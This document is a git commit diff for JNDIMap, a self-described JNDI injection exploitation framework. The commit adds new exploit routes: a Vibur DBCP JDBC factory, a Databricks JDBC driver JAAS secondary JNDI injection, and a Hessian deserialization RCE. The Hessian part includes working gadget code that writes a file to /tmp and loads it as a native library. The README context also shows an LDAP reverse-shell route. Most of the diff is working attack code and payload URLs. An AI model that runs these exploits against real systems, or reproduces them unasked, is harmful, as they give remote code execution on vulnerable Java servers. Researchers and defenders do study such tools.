feat: 支持 Vibur DBCP + Databricks + Hessian RCE

Author: X1r0z

README.en.md

@@ -42,8 +42,9 @@ ldap://10.0.0.1:1389/Basic/ReverseShell/10.0.0.1/1337
 - MemShell injection (based on [MemShellParty](https://github.com/ReaJason/MemShellParty))
 - High version JDK Bypass
   - BeanFactory Bypass (Tomcat/Groovy/XStream, etc.)
-  - JDBC RCE (MySQL/PostgreSQL/H2/Derby)
+  - JDBC RCE (MySQL/PostgreSQL/H2/Derby, etc.)
   - Tomcat Blind XXE
+  - Hessian RCE
 - LDAP Deserialization (including common gadgets)
 - Customize JNDI payload based on Nashorn JS engine
 - LDAP trustSerialData Bypass
@@ -76,7 +77,9 @@ ldap://10.0.0.1:1389/Basic/ReverseShell/10.0.0.1/1337
   - [Apache Derby](USAGE.en.md#derby)
     - [Derby SQL RCE](USAGE.en.md#derby-sql-rce)
     - [Derby Master-Slave Replication Deserialization RCE](USAGE.en.md#derby-master-slave-replication-deserialization-rce)
+  - [Databricks](USAGE.en.md#databricks)
 - [Tomcat Blind XXE](USAGE.en.md#tomcat-blind-xxe)
+- [Hessian RCE](USAGE.en.md#hessian-rce)
 - [LDAP Deserialization](USAGE.en.md#ldap-deserialization)
   - [Custom Data Deserialization](USAGE.en.md#custom-data-deserialization)
   - [CommonsCollections](USAGE.en.md#commonscollections)

README.md

@@ -42,8 +42,9 @@ ldap://10.0.0.1:1389/Basic/ReverseShell/10.0.0.1/1337
 - 内存马注入 (基于 [MemShellParty](https://github.com/ReaJason/MemShellParty))
 - 高版本 JDK 绕过
   - BeanFactory 绕过 (Tomcat/Groovy/XStream, etc.)
-  - JDBC RCE (MySQL/PostgreSQL/H2/Derby)
+  - JDBC RCE (MySQL/PostgreSQL/H2/Derby, etc.)
   - Tomcat Blind XXE
+  - Hessian RCE
 - LDAP 反序列化 (包含常用 Gadget)
 - Nashorn JS 自定义 JNDI Payload
 - LDAP trustSerialData 绕过
@@ -76,7 +77,9 @@ ldap://10.0.0.1:1389/Basic/ReverseShell/10.0.0.1/1337
   - [Apache Derby](USAGE.md#derby)
     - [Derby SQL RCE](USAGE.md#derby-sql-rce)
     - [Derby 主从复制反序列化 RCE](USAGE.md#derby-主从复制反序列化-rce)
+  - [Databricks](USAGE.md#databricks)
 - [Tomcat Blind XXE](USAGE.md#tomcat-blind-xxe)
+- [Hessian RCE](USAGE.md#hessian-rce)
 - [LDAP Deserialization](USAGE.md#ldap-deserialization)
   - [自定义数据反序列化](USAGE.md#自定义数据反序列化)
   - [CommonsCollections](USAGE.md#commonscollections)

USAGE.en.md

@@ -198,7 +198,7 @@ Use XStream deserialization to achieve RCE (version <= 1.4.15)
 The deserialization part uses UIDefaults + SwingLazyValue to trigger the following gadgets in sequence:
 
 - Arbitrary file write: `com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename`
-- XSLT Loading: `com.sun.org.apache.xalan.internal.xslt.Process._main`
+- XSLT loading: `com.sun.org.apache.xalan.internal.xslt.Process._main`
 
 The XSLT payload uses Spring's reflection library to call defineClass, so it requires a Spring environment
 
@@ -294,6 +294,7 @@ Support JDBC RCE for the following database connection pools
 - Tomcat JDBC
 - Alibaba Druid
 - HikariCP
+- Vibur DBCP
 
 Replace the `Factory` in the URL with one of the following:
 
@@ -304,6 +305,7 @@ Replace the `Factory` in the URL with one of the following:
 - TomcatJDBC
 - Druid
 - HikariCP
+- Vibur
 
 Because Alibaba Druid's DruidDataSourceFactory doesn't support the breakAfterAcquireFailure and connectionErrorRetryAttempts parameters, by default, if the JDBC connection fails, an infinite retry cycle will occur in the newly created thread. This can cause the console to continuously output error messages and lead to log explosion and other problems. Using this feature is not recommended unless necessary. Reference: [https://github.com/alibaba/druid/issues/3772](https://github.com/alibaba/druid/issues/3772)*
 
@@ -480,6 +482,15 @@ Usage: java -cp JNDIMap.jar map.jndi.server.DerbyServer [-p <port>] [-g <gadget>
 
 `-h`: show usage
 
+### Databricks
+
+Secondary JNDI injection via JAAS configuration in Databricks JDBC driver (version <= 2.6.38)
+
+```bash
+# JNDI injection
+ldap://127.0.0.1:1389/Factory/Databricks/JNDI/<url>
+```
+
 ## Tomcat Blind XXE
 
 Use `org.apache.catalina.users.MemoryUserDatabaseFactory` to achieve Blind XXE
@@ -502,6 +513,22 @@ Due to JDK limitations, XXE can only read single-line files that do not contain
 [HTTP] Receive request: /V4J4ZH1P?content=helloworld
 ```
 
+## Hessian RCE
+
+Exploiting Hessian deserialization RCE using `com.caucho.hessian.client.HessianProxyFactory`
+
+The deserialization part uses UIDefaults + ProxyLazyValue to trigger the following gadgets in sequence:
+
+- Arbitrary file write: `com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename`
+- Dynamic library loading: `java.lang.System.load`
+
+```bash
+# Hessian RCE
+ldap://127.0.0.1:1389/Hessian/<interface>/LoadLibrary/<path-to-native-library>
+```
+
+Note that this route requires specifying the `interface` to set the interface class for the dynamic proxy. The server must have logic that calls any method of this interface after the JNDI lookup; otherwise, the deserialization will not be triggered
+
 ## LDAP Deserialization
 
 Supports Java deserialization via LDAP and LDAP protocols (RMI protocol is not supported)

USAGE.md

@@ -294,6 +294,7 @@ gcc -shared -fPIC exp.c -o exp.so
 - Tomcat JDBC
 - Alibaba Druid
 - HikariCP
+- Vibur DBCP
 
 需要将 URL 中的 `Factory` 替换为如下内容之一
 
@@ -304,6 +305,7 @@ gcc -shared -fPIC exp.c -o exp.so
 - TomcatJDBC
 - Druid
 - HikariCP
+- Vibur
 
 *因为 Alibaba Druid 的 DruidDataSourceFactory 并不支持配置 breakAfterAcquireFailure 和 connectionErrorRetryAttempts 参数, 在默认情况下, 如果 JDBC 连接失败, 则会在创建的新线程中陷入无限重试, 这可能会使得控制台死循环不断输出报错信息, 导致日志爆炸等问题, 非必要条件不建议使用. 参考: [https://github.com/alibaba/druid/issues/3772](https://github.com/alibaba/druid/issues/3772)*
 
@@ -480,6 +482,15 @@ Usage: java -cp JNDIMap.jar map.jndi.server.DerbyServer [-p <port>] [-g <gadget>
 
 `-h`: 显示 Usage 信息
 
+### Databricks
+
+通过 Databricks JDBC 驱动的 JAAS 配置实现二次 JNDI 注入 (版本 <= 2.6.38)
+
+```bash
+# JNDI 注入
+ldap://127.0.0.1:1389/Factory/Databricks/JNDI/<url>
+```
+
 ## Tomcat Blind XXE
 
 利用 `org.apache.catalina.users.MemoryUserDatabaseFactory` 实现无回显 XXE
@@ -502,6 +513,22 @@ ldap://127.0.0.1:1389/TomcatXXE/<base64-url-encoded-path>
 [HTTP] Receive request: /V4J4ZH1P?content=helloworld
 ```
 
+## Hessian RCE
+
+利用 `com.caucho.hessian.client.HessianProxyFactory` 实现 Hessian 反序列化 RCE
+
+反序列化部分使用 UIDefaults + ProxyLazyValue 依次触发下列 Gadget:
+
+- 任意文件写: `com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename`
+- 动态库加载: `java.lang.System.load`
+
+```bash
+# Hessian RCE
+ldap://127.0.0.1:1389/Hessian/<interface>/LoadLibrary/<path-to-native-library>
+```
+
+注意该路由需要指定 `interface` 以设置动态代理的接口类, 服务端在 JNDI 查询之后必须存在调用该接口任意方法的逻辑, 否则不会触发反序列化
+
 ## LDAP Deserialization
 
 通过 LDAP、LDAPS 协议触发 Java 反序列化, 不支持 RMI 协议

pom.xml

@@ -4,7 +4,7 @@
     <modelVersion>4.0.0</modelVersion>
     <groupId>io.exp10it</groupId>
     <artifactId>JNDIMap</artifactId>
-    <version>0.0.4</version>
+    <version>0.0.5</version>
     <name>JNDIMap</name>
     <description>JNDIMap is a powerful JNDI injection exploitation framework that supports RMI, LDAP and LDAPS protocols, including various bypass methods for high-version JDK restrictions</description>
     <properties>
@@ -82,6 +82,11 @@
             <artifactId>fastjson2</artifactId>
             <version>2.0.26</version>
         </dependency>
+        <dependency>
+            <groupId>com.caucho</groupId>
+            <artifactId>hessian</artifactId>
+            <version>4.0.66</version>
+        </dependency>
         <dependency>
             <groupId>io.github.reajason</groupId>
             <artifactId>generator</artifactId>

src/main/java/map/jndi/Config.java

@@ -5,7 +5,7 @@
 
 @Command(
         name = "JNDIMap.jar",
-        version = "0.0.3",
+        version = "0.0.5",
         description = "JNDI injection exploitation framework",
         mixinStandardHelpOptions = true,
         sortOptions = false,

src/main/java/map/jndi/controller/DatabaseController.java

@@ -459,4 +459,28 @@ public Properties derbyReverseShell(String database, String host, String port) {
 
         return props;
     }
+
+    @JNDIMapping("/Databricks/JNDI/{url}")
+    public Properties databricksJNDI(String url) {
+        System.out.println("[Databricks] [JNDI] URL: " + url);
+
+        String jaasName = MiscUtil.getRandStr(8) + ".conf";
+        String jaasContent = "Client {\n" +
+                "  com.sun.security.auth.module.JndiLoginModule required\n" +
+                "  user.provider.url=\"" + url + "\"\n" +
+                "  group.provider.url=\"test\"\n" +
+                "  useFirstPass=true\n" +
+                "  serviceName=\"test\"\n" +
+                "  debug=true;\n" +
+                "};";
+        WebServer.getInstance().serveFile("/" + jaasName, jaasContent.getBytes());
+
+        String jdbcUrl = "jdbc:databricks://127.0.0.1:443;AuthMech=1;principal=test;KrbAuthType=1;httpPath=/;KrbHostFQDN=test;KrbServiceName=test;krbJAASFile=" + Main.config.codebase + jaasName;
+
+        Properties props = new Properties();
+        props.setProperty("driver", "com.databricks.client.jdbc.Driver");
+        props.setProperty("url", jdbcUrl);
+
+        return props;
+    }
 }

src/main/java/map/jndi/controller/HessianController.java

@@ -0,0 +1,55 @@
+package map.jndi.controller;
+
+import map.jndi.Main;
+import map.jndi.annotation.JNDIController;
+import map.jndi.annotation.JNDIMapping;
+import map.jndi.gadget.HessianGadgets;
+import map.jndi.server.WebServer;
+import map.jndi.util.MiscUtil;
+
+import javax.naming.Reference;
+import javax.naming.StringRefAddr;
+import java.nio.file.Files;
+import java.nio.file.Paths;
+import java.util.Properties;
+
+@JNDIController
+@JNDIMapping("/Hessian/{interface}")
+public class HessianController implements Controller {
+    public Object process(Properties props) throws Exception {
+        String interfaceName = props.getProperty("interface");
+        String path = props.getProperty("path");
+
+        System.out.println("[Hessian] Interface: " + interfaceName);
+
+        String fileName = "/tmp/" + MiscUtil.getRandStr(8) + ".log";
+        byte[] content = Files.readAllBytes(Paths.get(path));
+
+        byte[] header = "HabF".getBytes();
+        byte[] body = HessianGadgets.loadLibrary(fileName, content);
+
+        byte[] payload = new byte[header.length + body.length];
+        System.arraycopy(header, 0, payload, 0, header.length);
+        System.arraycopy(body, 0, payload, header.length, body.length);
+
+        String route = MiscUtil.getRandStr(8);
+        WebServer.getInstance().serveFile("/" + route, payload);
+
+        Reference ref = new Reference("test", "com.caucho.hessian.client.HessianProxyFactory", null);
+        ref.add(new StringRefAddr("type", interfaceName));
+        ref.add(new StringRefAddr("url", Main.config.codebase + route));
+
+        return ref;
+    }
+
+    @JNDIMapping("/LoadLibrary/{path}")
+    public Properties loadLibrary(String interfaceName, String path) {
+        System.out.println("[Hessian] LoadLibrary Path: " + path);
+
+        Properties props = new Properties();
+        props.setProperty("interface", interfaceName);
+        props.setProperty("path", path);
+
+        return props;
+    }
+}

src/main/java/map/jndi/controller/jdbc/ViburController.java

@@ -0,0 +1,28 @@
+package map.jndi.controller.jdbc;
+
+import map.jndi.annotation.JNDIController;
+import map.jndi.annotation.JNDIMapping;
+
+import javax.naming.Reference;
+import javax.naming.StringRefAddr;
+import java.util.Properties;
+
+@JNDIController
+@JNDIMapping("/Vibur")
+public class ViburController extends SingleCommandController {
+    public Object process(Properties props) {
+        System.out.println("[Reference] Factory: Vibur");
+
+        Reference ref = new Reference("javax.sql.DataSource", "org.vibur.dbcp.ViburDBCPObjectFactory", null);
+        ref.add(new StringRefAddr("driverClassName", props.getProperty("driver")));
+        ref.add(new StringRefAddr("jdbcUrl", props.getProperty("url")));
+        ref.add(new StringRefAddr("username", "test"));
+        ref.add(new StringRefAddr("password", "test"));
+
+        if (props.getProperty("sql") != null) {
+            ref.add(new StringRefAddr("initSQL", props.getProperty("sql")));
+        }
+
+        return ref;
+    }
+}

src/main/java/map/jndi/gadget/HessianGadgets.java

@@ -0,0 +1,57 @@
+package map.jndi.gadget;
+
+import com.caucho.hessian.io.Hessian2Output;
+import map.jndi.util.ReflectUtil;
+
+import javax.swing.*;
+import java.io.ByteArrayOutputStream;
+import java.lang.reflect.Method;
+import java.util.HashMap;
+
+public class HessianGadgets {
+    public static byte[] loadLibrary(String fileName, byte[] content) throws Exception {
+        UIDefaults.ProxyLazyValue proxyLazyValue1 = new UIDefaults.ProxyLazyValue("com.sun.org.apache.xml.internal.security.utils.JavaUtils", "writeBytesToFilename", new Object[]{fileName, content});
+        UIDefaults.ProxyLazyValue proxyLazyValue2 = new UIDefaults.ProxyLazyValue("java.lang.System", "load", new Object[]{fileName});
+
+        ReflectUtil.setFieldValue(proxyLazyValue1, "acc", null);
+        ReflectUtil.setFieldValue(proxyLazyValue2, "acc", null);
+
+        UIDefaults u1 = new UIDefaults();
+        UIDefaults u2 = new UIDefaults();
+        u1.put("aaa", proxyLazyValue1);
+        u2.put("aaa", proxyLazyValue1);
+
+        HashMap map1 = makeMap(u1, u2);
+
+        UIDefaults u3 = new UIDefaults();
+        UIDefaults u4 = new UIDefaults();
+        u3.put("bbb", proxyLazyValue2);
+        u4.put("bbb", proxyLazyValue2);
+
+        HashMap map2 = makeMap(u3, u4);
+
+        HashMap map = new HashMap();
+        map.put(1, map1);
+        map.put(2, map2);
+
+        return serialize2(map);
+    }
+
+    private static HashMap<Object, Object> makeMap(Object v1, Object v2) throws Exception {
+        HashMap<Object, Object> map = new HashMap<>();
+        Method putValMethod = HashMap.class.getDeclaredMethod("putVal", int.class, Object.class, Object.class, boolean.class, boolean.class);
+        putValMethod.setAccessible(true);
+        putValMethod.invoke(map, 0, v1, 123, false, true);
+        putValMethod.invoke(map, 1, v2, 123, false, true);
+        return map;
+    }
+
+    private static byte[] serialize2(Object o) throws Exception {
+        ByteArrayOutputStream bao = new ByteArrayOutputStream();
+        Hessian2Output output = new Hessian2Output(bao);
+        output.getSerializerFactory().setAllowNonSerializable(true);
+        output.writeObject(o);
+        output.flush();
+        return bao.toByteArray();
+    }
+}